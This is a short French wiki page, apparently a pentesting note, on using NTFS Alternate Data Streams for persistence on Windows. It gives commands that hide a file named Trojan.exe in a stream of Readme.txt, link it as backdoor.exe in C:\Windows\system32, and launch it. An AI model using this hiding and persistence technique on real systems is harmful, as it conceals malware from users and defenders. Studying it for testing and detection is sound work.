# [Persistence/Windows] NTFS Data Stream

## Introduction

Les **Alternate Data Streams**, ou <span style="text-decoration: underline;">**ADS**</span>, permettent de cacher des fichiers dans des fichiers sur des systèmes de fichiers NTFS.

[![image.png](https://wiki.neopipe.fr/uploads/images/gallery/2024-04/scaled-1680-/07bimage.png)](https://wiki.neopipe.fr/uploads/images/gallery/2024-04/07bimage.png)

## Manuel

```powershell
type Trojan.exe > c:\Readme.txt:Trojan.exe
```

Pour créer un lien dans le fichier **Readme.txt** vers le Trojan :

```powershell
cd c:\Windows\system32
mklink backdoor.exe Readme.txt:Trojan.exe
```

Vous devriez pouvoir lancer votre backdoor de la manière suivante :

```powershell
backdoor
```